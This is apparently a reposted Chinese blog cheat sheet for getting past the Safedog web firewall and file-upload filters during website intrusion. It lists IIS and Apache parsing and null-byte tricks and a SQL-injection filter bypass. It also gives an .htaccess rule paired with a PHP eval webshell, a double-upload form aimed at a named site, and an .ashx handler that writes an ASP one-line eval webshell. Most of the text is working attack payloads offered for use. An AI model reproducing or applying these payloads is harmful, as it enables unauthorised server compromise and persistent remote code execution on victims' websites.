突破各种安全软件 安全狗 继续渗透 上传

抓包修改数据为:IIS忽略冒号后面格式 cs.asp:.jpg

火狐FIREBUG修改本地JS

upfile/upfile_other.asp upfile_photo.asp upfile_flash.asp

asa cer asaspp

隐藏表单,hidden修改数据,file

00 1.asp;.jpg

十六进制00: 1.asp

双文件上传

文件名大小写突破,对于LINUX等非WINDOWS系统

asp空格

asp.

/xx.jpg%00.php

cecerr aasasa

Content-Type: image/gif (原为 Content-Type: text/plain)

上传一个shtml文件, 内容为: <!--#include file="conn.asp"--> 直接查看源文件,找数据库,然后...

apache的解析漏洞(上传1.php.hack,因为hack非法后缀,所以直接当作php执行了.

文件名为www.xxx.com/1.asp;1.jpg。这样的会被IIS安全狗果断屏蔽。改成如下名称,IIS6一样会解析:www.xxx.com/;1.asp;1.jpg


常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。但如果:seo.asp?seo.com=%00.&id=69%20 and 1=1

利用.htaccess突破限制:

1.首先上传.htaccess文件到某目录下,.htacess规则:

<FilesMatch "hahahe">
SetHandler application/x-httpd-php
</FilesMatch>

2.再上传一个文件,后缀任意写,内容:

"hahahe"<?php @eval($_POST['dukong']);?>

双文件上传突破:

<form action="http://www.syxldwgy.com/upfile_Other.asp " method="post" name="form1" enctype="multipart/form-data">
<input name="FileName1" type="FILE" class="tx1" size="20">
<input name="FileName2" type="FILE" class="tx1" size="20">
<input type="submit" name="Submit" value="上传">
</form>
View Code

.ashx文件.NET 生成root.asp一句话马:

<%@ WebHandler Language="C#" Class="Handler" %>

using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
    
    public void ProcessRequest (HttpContext context) {
        context.Response.ContentType = "text/plain";
        
        StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
        file1.Write("<%eval request("mima")%>");
        file1.Flush();
        file1.Close();
        
    }

    public bool IsReusable {
        get {
            return false;
        }
    }

}
View Code
原文地址:https://www.cnblogs.com/qunshu/p/3286593.html